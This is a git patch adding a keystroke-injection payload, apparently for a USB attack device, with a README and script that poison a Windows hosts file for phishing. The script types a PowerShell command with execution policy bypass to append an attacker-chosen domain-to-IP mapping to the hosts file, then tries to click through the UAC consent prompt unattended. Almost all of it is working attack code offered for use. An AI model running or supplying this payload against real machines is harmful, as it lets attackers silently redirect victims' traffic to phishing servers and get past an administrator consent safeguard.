From e9916c88aad101c68b42faee1fe6dba59bb25f18 Mon Sep 17 00:00:00 2001 From: Ian Costa Date: Mon, 11 Jan 2021 11:43:00 -0500 Subject: [PATCH] Windows Powershell Local DNS Poisoning payload (#427) * Created Powershell_Local_DNS_Poisoning payload * Fixed README.md formatting --- .../Powershell_Local_DNS_Poisoning/README.md | 20 +++++++ .../payload.txt | 59 +++++++++++++++++++ 2 files changed, 79 insertions(+) create mode 100644 payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md create mode 100644 payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt diff --git a/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md new file mode 100644 index 00000000..82eae78a --- /dev/null +++ b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md @@ -0,0 +1,20 @@ +# Hosts file DNS poisoning using Powershell + +## Description +Redirects a given domain name to the target IP address. Uses the run prompt and Powershell to edit the hosts file, should work with any Windows version with those features but only tested on Windows 10. + +Change the variables under "options" in the setup stage before executing. + +## Options +| Variable | Description | +|-----------------|------------------------------------------| +| poisoned_domain | This domain will point to the target IP | +| target_ip | The IP that the domain should resolve to | + +## LED States +| State | Color | Description | +|--------|---------------------|-----------------------------------------| +| SETUP | Magenta solid | Set attackmode and initialize variables | +| STAGE1 | Yellow single blink | Modifying the hosts file | +| STAGE2 | Yellow double blink | Bypassing UAC | +| FINISH | Green solid | Script completed | diff --git a/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt new file mode 100644 index 00000000..20c2b214 --- /dev/null +++ b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt @@ -0,0 +1,59 @@ +#!/bin/bash +########################################################################## +# Title: Powershell Local DNS Poisoning +# Description: Edits the hosts file to redirect an IP to a domain +# Author: SammyTheBEAST +# Version: 1 +# Category: Phishing +# Target: Windows 10 +# Attackmode: HID +# +# Variables: +# poisoned_domain: This domain will point to the target IP +# target_ip: The IP that the domain should resolve to +# LED States: +# SETUP (Magenta solid): Set attackmode and initialize variables +# STAGE1 (Yellow single blink): Modifying the hosts file +# STAGE2 (Yellow double blink): Bypassing UAC +# FINISH (Green solid): Script completed +########################################################################## + +LED SETUP +ATTACKMODE HID +SET_LANGUAGE us + +# Options +poisoned_domain="POISONED_DOMAIN" +target_ip="TARGET_IP" + + +##### Edit the hosts file ##### +LED STAGE1 +# Open the run prompt +Q GUI r +Q DELAY 500 +# Append a string to the hosts file +Q STRING "powershell -noprofile -exec bypass -c \"Add-Content -Path \$Env:SystemRoot\System32\drivers\etc\hosts -Value '$target_ip $poisoned_domain'\"" +Q DELAY 50 +# Run as administrator +Q CTRL-SHIFT ENTER +Q DELAY 500 + + +##### Bypass UAC ##### +LED STAGE2 +# Attempt to bypass if window is already focused +Q LEFTARROW +Q DELAY 50 +Q ENTER +# If the UAC window was not focused: +# Run a powershell command to focus the window +RUN WIN 'powershell -noprofile -exec bypass -c "(New-Object -ComObject WScript.Shell).AppActivate((get-process consent).MainWindowTitle)"' +Q DELAY 500 +# Bypass once UAC window is focused +Q LEFTARROW +Q DELAY 50 +Q ENTER + + +LED FINISH